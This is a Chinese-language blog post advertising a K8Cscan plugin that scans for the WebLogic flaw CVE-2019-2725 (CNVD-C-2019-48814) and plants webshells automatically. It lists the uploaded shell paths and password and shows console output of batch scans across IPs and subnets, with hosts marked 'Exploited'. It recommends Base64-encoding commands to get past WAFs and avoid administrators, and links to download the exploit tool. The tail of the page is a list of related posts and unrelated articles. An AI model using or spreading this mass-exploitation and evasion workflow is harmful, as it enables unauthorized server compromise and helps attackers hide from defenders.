[原创]K8Cscan插件之Weblogic漏洞扫描&通用GetShell Exploit
主程序: K8Cscan 大型内网渗透自定义扫描器
https://www.cnblogs.com/k8gege/p/10519321.html
WeblogicScan插件
K8Cscan Moudle WeblogicScan & Exploit
目前仅支持漏洞编号 CNVD-C-2019-48814
该版本为探测weblogic漏洞并自动GetShell
外网可当成EXP使用,也可内网自动渗透用
无论内外网均可批量(填写ip或ip段列表即可)
(弄exp的时候还没CVE,所以回显写着CNVD,过了两天才有CVE-2019-2725,同一个漏洞不同叫法而已大家不要慌)

3.6支持URL和IP端口

用法:
K8cmdshell 向两个默认路径上传webshell
使用飞刀cmd连接,经过Base64加密可过waf
传输CMD命令不加密,容易被WAF拦截或管理员发现 http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom
//http://192.168.1.106:7001/_async/shell.jsp tom
//http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(当成EXP用,填写内网或外网IP即可)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106
Cscan 3.5
By K8gege
load netscan.dll
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
Finished! 指定C段
C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24
Cscan 3.5
By K8gege
load netscan.dll Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
192.168.1.100
=============================================
onlinePC:5
Finished! 指定IP列表同目录下ip.txt(示例扫描3个IP)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ip.txt (IP)
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.105
192.168.1.1
=============================================
onlinePC:3
Finished! 指定C段列表同目录下ipc.txt(示例扫描一个IP段)
C:\Users\K8team\Desktop\Cscan>Cscan20.exe
Cscan 3.5
By K8gege
load netscan.dll
scan ipc.txt (IP/24) Segment: 192.168.1.0
=============================================
192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
192.168.1.1
192.168.1.105
192.168.1.108
=============================================
onlinePC:4
Finished!
3、下载
自动Getshell
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar
仅扫描漏洞
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar
主程序
https://github.com/k8gege/K8CScan
[原创]K8Cscan插件之Weblogic漏洞扫描&通用GetShell Exploit的更多相关文章
- [原创]K8Cscan插件之Web主机扫描(存活主机、机器名、Banner、标题)
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之存活主机扫描
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之Cisco思科设备扫描(IP、设备型号、主机名、Boot、硬件版本)
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之FTP弱口令扫描
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之C段旁站扫描\子域名扫描
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之端口扫描C#源码
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之多种方式系统版本探测
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之Windows密码爆破
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
- [原创]K8Cscan插件之Mysql密码爆破
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介:何为自定义扫描器?其实也是插件化,但C ...
随机推荐
- java -相关技术
地址: http://www.codeyyy.com/java/11-35-52.html
- Code First的实体继承模式
Entity Framework的Code First模式有三种实体继承模式 1.Table per Type (TPT)继承 2.Table per Class Hierarchy(TPH)继承 3 ...
- web安全系列4:google语法
这是web安全的第四篇,欢迎翻看前面几篇. 前面我们介绍了一些和HTTP有关知识,那么一个疑问就是黑客要做的第一件是什么?其实很简单,确定一个目标,然后搜集信息. 这很容易理解,我们无论做什么都得先有 ...
- 2019.03.28 bzoj3326: [Scoi2013]数数(数位dp)
传送门 题意: 一个人数数,规则如下: 确定数数的进制B 确定一个数数的区间[L, R] 对于[L, R] 间的每一个数,把该数视为一个字符串,列出该字符串的所有连续子串对应的B进制数的值. 对所有列 ...
- 无法获得锁 /var/lib/dpkg/lock - open
关于 apt-get update 更新的时候出现 无法获得锁 /var/lib/dpkg/lock - open 解决 直接删除这个锁文件即可: sudo rm /var/lib/dpkg/lock ...
- MFC中添加控制台输出
可以在CWinApp的InitInstance()中调用下面的函数,以生成控制台: #include <io.h> #include <fcntl.h> void InitCo ...
- CentOS 6下升级Python版本
CentOS6.8默认的python版本是2.6,而现在好多python组件开始只支持2.7以上的版本,比如说我今天遇到的pip install pysqlite,升级python版本是一个痛苦但又常 ...
- enumerate的用法
names = ["tony","huluwa","tom","jerry","lala"]for ...
- eclipse设置新建jsp文件默认字符编码为utf-8
在使用Eclipse开发中,编码默认是ISO-8859-1,不支持中文.这样我们每次新建文件都要手动修改编码,非常麻烦.其实我们可以设置文件默认编码,今后再新建文件时就不用修改编码了. 1.打开Ecl ...
- Redis-07.Spring Data整合Jedis
Spring整合Jedis 1.单实例(想节约时间的请直接拖到下面跳过1.2部分) step1:毫无疑问,首先需要在pom.xml中配置Jedis依赖 <dependency> <g ...